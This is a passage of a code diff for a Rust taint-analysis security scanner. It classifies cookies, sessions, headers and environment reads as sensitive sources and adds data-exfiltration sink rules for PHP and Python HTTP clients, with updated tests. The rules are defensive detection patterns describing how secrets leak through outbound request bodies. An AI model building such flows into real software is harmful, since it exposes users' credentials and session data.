+ Plain, + /// Carries operator state the user should not see leak out, cookies, + /// auth headers, env, file system reads, database rows. + Sensitive, + /// Reserved for future explicit secret classifications (API keys, + /// credential stores, key material). No source currently produces + /// this, but the threshold check in `effective_sink_caps` already + /// handles it monotonically. + Secret, +} + +impl SourceKind { + /// Return the sensitivity tier this source kind belongs to. Drives the + /// `Cap::DATA_EXFIL` cap-suppression decision in `ast.rs`. + pub fn sensitivity(self) -> Sensitivity { + match self { + // Plain user-controlled input, the user already has the data, + // surfacing it back to them via an outbound request is not a + // disclosure. + SourceKind::UserInput => Sensitivity::Plain, + // Operator-bound state, leaking these via an outbound request + // is a real cross-boundary disclosure. + SourceKind::Cookie + | SourceKind::Header + | SourceKind::EnvironmentConfig + | SourceKind::FileSystem + | SourceKind::Database => Sensitivity::Sensitive, + // Caught exceptions can carry stack traces, db errors, internal + // paths, treat them as sensitive by default. + SourceKind::CaughtException => Sensitivity::Sensitive, + // Conservative default for unclassified sources, surface + // findings rather than silently drop them. + SourceKind::Unknown => Sensitivity::Sensitive, + } + } +} + /// Infer the source kind from capabilities and callee name. pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { let cl = callee.to_ascii_lowercase(); + // Cookie / Header are checked *before* the generic user-input bucket + // because they imply higher sensitivity (auth material, session ids). + // The generic UserInput substrings (`request`, `header`, `cookie`) + // would otherwise swallow these. 
+ // + // Session stores carry auth material (CSRF tokens, signed user ids) of + // the same sensitivity tier as raw cookies, so route them through the + // `Cookie` arm. Note `cl` is lower-cased, so this substring check + // also matches a capitalised `Session` callee; nothing here excludes + // client constructors, so that is left to the per-language label rules. + if cl.contains("cookie") || cl.contains("session") { + return SourceKind::Cookie; + } + if cl.contains("header") { + return SourceKind::Header; + } + // User input patterns if cl.contains("argv") || cl.contains("stdin") @@ -498,11 +578,23 @@ pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { || cl.contains("params") || cl.contains("input") || cl.contains("body") - || cl.contains("header") - || cl.contains("cookie") || cl.contains("location") || cl.contains("document.url") || cl.contains("document.referrer") + // PHP superglobals: the AST text preserves the `$` (member-text + // extraction reads the `variable_name` node verbatim) so we match + // both `$_POST` and the `_POST` form some collectors emit. + // `$_REQUEST` already matches via the `request` substring above; + // `$_COOKIE` / `$_SESSION` route through the Cookie tier earlier in + // the function. `$_SERVER` is operator-state-bearing (auth headers + // etc.) so it stays Sensitive by falling through to the Unknown + // bucket. 
+ || cl == "$_get" + || cl == "$_post" + || cl == "$_files" + || cl == "_get" + || cl == "_post" + || cl == "_files" { return SourceKind::UserInput; } @@ -542,6 +634,8 @@ pub fn infer_source_kind(caps: Cap, callee: &str) -> SourceKind { pub fn severity_for_source_kind(kind: SourceKind) -> crate::patterns::Severity { match kind { SourceKind::UserInput => crate::patterns::Severity::High, + SourceKind::Cookie => crate::patterns::Severity::High, + SourceKind::Header => crate::patterns::Severity::High, SourceKind::EnvironmentConfig => crate::patterns::Severity::High, SourceKind::FileSystem => crate::patterns::Severity::Medium, SourceKind::Database => crate::patterns::Severity::Medium, @@ -986,11 +1080,20 @@ pub fn classify_gated_sink( None => return out, }; + // Match against the original callee text AND a chain-normalised form + // that strips `()` between dots so a chained construction like + // `httpx.AsyncClient().post` matches a gate matcher of + // `httpx.AsyncClient.post`. Mirrors the normalisation applied by + // `classify` for flat label rules. let callee_bytes = callee_text.as_bytes(); + let normalized = normalize_chained_call(callee_text); + let normalized_bytes = normalized.as_bytes(); for gate in *gates { let matcher = gate.callee_matcher.as_bytes(); - if !match_suffix_cs(callee_bytes, matcher, gate.case_sensitive) { + if !match_suffix_cs(callee_bytes, matcher, gate.case_sensitive) + && !match_suffix_cs(normalized_bytes, matcher, gate.case_sensitive) + { continue; } @@ -1473,26 +1576,69 @@ mod tests { // CVE Hunt Session 2 (Go CVE-2023-3188 Owncast SSRF): // `http.DefaultClient.Get/Post/Head/Do/PostForm` is the idiomatic Go // SSRF sink shape (`http.DefaultClient` is the package-level shared - // `*http.Client`). Bare `Get`/`Post` matchers would over-match - // unrelated method names; the explicit `http.DefaultClient.*` matcher - // restricts the suffix-match to the stdlib helper while leaving - // user-defined `myClient.Get` alone (no false positives). 
+ // `*http.Client`). These callees migrated from a flat `Sink(SSRF)` + // rule to destination-aware gated sinks so that DATA_EXFIL gates can + // coexist on the same callee (e.g. `http.DefaultClient.Post(url, _, + // body)` carries SSRF on arg 0 and DATA_EXFIL on arg 2). The + // assertions below check the gate registration rather than the flat + // classifier output. #[test] - fn classify_go_http_default_client_get_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Get", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_get_is_ssrf_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + "go", + "http.DefaultClient.Get", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result.iter().any(|m| m.label == DataLabel::Sink(Cap::SSRF)), + "expected SSRF gate match, got {result:?}" + ); } #[test] - fn classify_go_http_default_client_post_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Post", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_post_is_ssrf_and_data_exfil_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + "go", + "http.DefaultClient.Post", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result.iter().any(|m| m.label == DataLabel::Sink(Cap::SSRF)), + "expected SSRF gate match, got {result:?}" + ); + assert!( + result + .iter() + .any(|m| m.label == DataLabel::Sink(Cap::DATA_EXFIL)), + "expected DATA_EXFIL gate match, got {result:?}" + ); } #[test] - fn classify_go_http_default_client_do_is_ssrf_sink() { - let result = classify("go", "http.DefaultClient.Do", None); - assert_eq!(result, Some(DataLabel::Sink(Cap::SSRF))); + fn classify_go_http_default_client_do_is_data_exfil_gate() { + let no_kw = |_: &str| None; + let no_kw_present = |_: &str| false; + let result = classify_gated_sink( + 
"go", + "http.DefaultClient.Do", + |_| None, + no_kw, + no_kw_present, + ); + assert!( + result + .iter() + .any(|m| m.label == DataLabel::Sink(Cap::DATA_EXFIL)), + "expected DATA_EXFIL gate match, got {result:?}" + ); } #[test] diff --git a/src/labels/php.rs b/src/labels/php.rs index 533572ad..ed287806 100644 --- a/src/labels/php.rs +++ b/src/labels/php.rs @@ -1,4 +1,6 @@ -use crate::labels::{Cap, DataLabel, Kind, LabelRule, ParamConfig, RuntimeLabelRule}; +use crate::labels::{ + Cap, DataLabel, GateActivation, Kind, LabelRule, ParamConfig, RuntimeLabelRule, SinkGate, +}; use crate::utils::project::{DetectedFramework, FrameworkContext}; use phf::{Map, phf_map}; @@ -138,8 +140,67 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sink(Cap::SSRF), case_sensitive: false, }, + // ── Cross-boundary data exfiltration ────────────────────────────────── + // + // Body-bearing outbound HTTP verb methods on the major PHP HTTP clients. + // Flat sinks here compose with the SSRF rule on `curl_exec` / + // `file_get_contents` via multi-label classification. The + // source-sensitivity gate in `effective_sink_caps` strips DATA_EXFIL + // when the contributing source is `Plain` (`$_GET`, `$_POST`, `$_REQUEST`), + // so this only fires for sensitive sources (cookies / sessions / + // server-side state / env / file / db reads). + // + // Covered clients: + // * `Guzzle\Client::post/put/patch` — guzzlehttp/guzzle + // matched by suffix on the verb method (chained `$client->post(...)`). 
+ // * `Symfony\HttpClient::request` — symfony/http-client + // request($method, $url, ['body' => $payload, 'json' => $data, ...]) + // * `Http::post` — Laravel HTTP facade (over Guzzle) + LabelRule { + matchers: &[ + "Client.post", + "Client.put", + "Client.patch", + "Client.request", + "HttpClient.post", + "HttpClient.put", + "HttpClient.patch", + "HttpClient.request", + "Http.post", + "Http.put", + "Http.patch", + ], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + }, ]; +/// Gated sinks for PHP. +/// +/// `curl_setopt($ch, CURLOPT_POSTFIELDS, $payload)` is the canonical +/// non-OO PHP HTTP-egress payload binding. The activation arg (index 1) is +/// a `define`d constant: `CURLOPT_POSTFIELDS` (and the byref-copying variant +/// `CURLOPT_COPYPOSTFIELDS`) carry the request body, while other CURLOPT_* +/// constants designate URL / auth / TLS / behaviour, none of which is +/// DATA_EXFIL-relevant. Gating on the constant identifier keeps the rule +/// from over-firing on `curl_setopt($ch, CURLOPT_URL, $url)` (covered +/// elsewhere by the `curl_exec` SSRF flat sink). +/// +/// Identifier-based activation is enabled via the macro-arg fallback in +/// `cfg::mod::classify_gated_sink` for `lang == "php"`. +pub static GATED_SINKS: &[SinkGate] = &[SinkGate { + callee_matcher: "curl_setopt", + arg_index: 1, + dangerous_values: &["CURLOPT_POSTFIELDS", "CURLOPT_COPYPOSTFIELDS"], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: true, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::ValueMatch, +}]; + pub static KINDS: Map<&'static str, Kind> = phf_map! 
{ // control-flow "if_statement" => Kind::If, diff --git a/src/labels/python.rs b/src/labels/python.rs index ff00110d..a955f7b8 100644 --- a/src/labels/python.rs +++ b/src/labels/python.rs @@ -44,6 +44,34 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Source(Cap::all()), case_sensitive: false, }, + // Session stores: session cookies / DRF / Django auth carry auth material + // the operator did not intend to leak. `infer_source_kind` maps `session` + // callees to `SourceKind::Cookie` (Sensitive) so flowing into an outbound + // request payload fires `DATA_EXFIL`. Case-sensitive: lowercase `session` + // here is the Flask global / Django request attribute; the capitalised + // `requests.Session` constructor is a client object, not a source, and + // must not be tagged. + // + // The matchers cover both attribute access (`request.session.user_id`, + // resolved as the attribute text) and the bare `session.` + // pattern that follows `from flask import session`. The `=session` + // exact-match form fires only when the call is the bare top-level + // `session(...)` so accidental field projections like + // `obj.client.session` (Phase 2 chained-receiver lowering) don't get + // mis-labelled as sources. + LabelRule { + matchers: &[ + "request.session", + "flask_request.session", + "flask.session", + "django.contrib.sessions", + "=session", + "session.get", + "session.pop", + ], + label: DataLabel::Source(Cap::all()), + case_sensitive: true, + }, // Django-specific sources (case-sensitive to avoid request.get() dict method FP) LabelRule { matchers: &[ @@ -208,58 +236,25 @@ pub static RULES: &[LabelRule] = &[ label: DataLabel::Sanitizer(Cap::FILE_IO), case_sensitive: false, }, + // Outbound HTTP — flat SSRF sinks for read-shaped methods (GET / HEAD) + // that don't carry a body. 
Body-bearing methods (POST / PUT / PATCH / + // DELETE / request) are modelled via destination-aware gates in + // GATED_SINKS so SSRF activation can be narrowed to the URL position + // and the cross-boundary `DATA_EXFIL` cap can attach to body kwargs as + // a separate gate. `urllib.request.urlopen` stays flat: its argument + // is a Request object whose payload-vs-URL split happens at + // `urllib.request.Request` construction (gated below). LabelRule { matchers: &[ "urllib.request.urlopen", "requests.get", - "requests.post", - "requests.put", - "requests.delete", - "requests.patch", "requests.head", - "requests.request", "httpx.get", - "httpx.post", - "httpx.put", - "httpx.delete", - "httpx.patch", "httpx.head", - "httpx.request", - ], - label: DataLabel::Sink(Cap::SSRF), - case_sensitive: false, - }, - // aiohttp HTTP client, SSRF sinks - LabelRule { - matchers: &[ "aiohttp.get", - "aiohttp.post", - "aiohttp.put", - "aiohttp.delete", - "aiohttp.request", - ], - label: DataLabel::Sink(Cap::SSRF), - case_sensitive: false, - }, - // Type-qualified SSRF sinks: when the receiver is tracked as - // TypeKind::HttpClient (e.g. `client = requests.Session()`, - // `client = httpx.Client()`, or `s = aiohttp.ClientSession()`), - // resolve_type_qualified_labels() constructs `"HttpClient."` - // call texts so the receiver-name is no longer load-bearing. Matches - // the existing Rust HttpClient. sink set so both languages - // stay in step on the type-aware SSRF model. Motivated by the - // upstream LMDeploy CVE-2026-33626 shape: - // client = requests.Session() - // response = client.get(url, ...) 
- LabelRule { - matchers: &[ + "aiohttp.head", "HttpClient.get", - "HttpClient.post", - "HttpClient.put", - "HttpClient.delete", - "HttpClient.patch", "HttpClient.head", - "HttpClient.request", "HttpClient.send", ], label: DataLabel::Sink(Cap::SSRF), @@ -332,6 +327,687 @@ pub static GATED_SINKS: &[SinkGate] = &[ dangerous_kwargs: &[("shell", &["True", "true"])], activation: GateActivation::ValueMatch, }, + // ── Outbound HTTP clients (SSRF + cross-boundary data exfiltration) ─── + // + // Body-bearing methods (POST / PUT / PATCH / DELETE / request) are + // gated by destination so that: + // * SSRF fires only when taint reaches the URL position (arg 0). + // * `DATA_EXFIL` fires only when taint reaches a body kwarg (`data` / + // `json` / `files` for requests / aiohttp; `content` / `data` / + // `json` / `files` for httpx). + // The pair lets a single `requests.post(taintedUrl, data=secret)` call + // report SSRF on the URL flow and DATA_EXFIL on the body flow as + // independent findings rather than a conflated combined cap. + // + // CFG-level kwarg-aware extraction (see `extract_destination_kwarg_pairs`) + // walks `keyword_argument` siblings and routes matching idents into the + // gate's `destination_uses` so the SSA sink scan only fires when the + // body kwarg itself is tainted. + // + // The source-sensitivity gate in `ast.rs` strips DATA_EXFIL when the + // contributing source is `Sensitivity::Plain` (raw `request.args`, + // `request.form`), so plain user input forwarded to a POST body does + // not surface — only sensitive sources (cookies, sessions, env, headers) + // produce a DATA_EXFIL finding. 
+ SinkGate { + callee_matcher: "requests.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: 
GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "requests.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // requests.request(method, url, ...) — note the URL is at arg 1, not + // arg 0; method is at arg 0. Body kwargs at arg 2+ via kwarg expansion. + SinkGate { + callee_matcher: "requests.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // httpx — `content` is httpx's raw-bytes body kwarg; `data` covers + // form-encoded; `json` covers JSON-encoded; `files` covers multipart. 
+ SinkGate { + callee_matcher: "httpx.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + 
activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // httpx.request(method, url, ...) — same shape as requests.request. + SinkGate { + callee_matcher: "httpx.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // Type-qualified variants: `requests.Session()`, `httpx.Client()`, + // `httpx.AsyncClient()`, `aiohttp.ClientSession()` instances all resolve + // to the synthetic `HttpClient.` callee text via + // `resolve_type_qualified_labels`. 
Covering both module-level and + // type-qualified forms ensures `s = requests.Session(); s.post(url, data=x)` + // and `client = httpx.AsyncClient(); await client.post(url, json=x)` both + // fire SSRF on the URL and DATA_EXFIL on the body kwarg. + SinkGate { + callee_matcher: "HttpClient.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.patch", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: 
&[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.patch", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.delete", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.delete", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "HttpClient.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "HttpClient.request", + arg_index: 2, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + // aiohttp module-level (`aiohttp.post`, `aiohttp.put`, etc.) 
— uncommon + // in real code (idiomatic usage is `async with aiohttp.ClientSession()`), + // covered for completeness. ClientSession. dispatches via the + // type-qualified `HttpClient.` gates above. + SinkGate { + callee_matcher: "aiohttp.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.put", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.put", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.request", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.request", + arg_index: 2, + dangerous_values: 
&[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[2], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + // Chained-construction variants: `httpx.AsyncClient().post(url, json=x)` + // / `httpx.Client().post(url, ...)` / `aiohttp.ClientSession().post(...)`. + // Chain-normalisation strips `()` between dots so the callee text + // becomes `httpx.AsyncClient.post`; gate matching applies to that + // normalised form so the chained shape is covered without binding to + // an intermediate variable. + SinkGate { + callee_matcher: "httpx.AsyncClient.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.AsyncClient.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "httpx.Client.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "httpx.Client.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + 
activation: GateActivation::Destination { + object_destination_fields: &["content", "data", "json", "files"], + }, + }, + SinkGate { + callee_matcher: "aiohttp.ClientSession.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "aiohttp.ClientSession.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json"], + }, + }, + SinkGate { + callee_matcher: "requests.Session.post", + arg_index: 0, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::SSRF), + case_sensitive: false, + payload_args: &[0], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &[], + }, + }, + SinkGate { + callee_matcher: "requests.Session.post", + arg_index: 1, + dangerous_values: &[], + dangerous_prefixes: &[], + label: DataLabel::Sink(Cap::DATA_EXFIL), + case_sensitive: false, + payload_args: &[1], + keyword_name: None, + dangerous_kwargs: &[], + activation: GateActivation::Destination { + object_destination_fields: &["data", "json", "files"], + }, + }, + // urllib.request.urlopen(req) — when req is a `urllib.request.Request` + // built with the `data` kwarg, that kwarg becomes the POST body. The + // gate fires on `Request(url, data=tainted)` directly: the constructor + // does not egress, but the convention is that wrapping data in a Request + // means egress is imminent (the urllib.request.Request → urlopen path). 
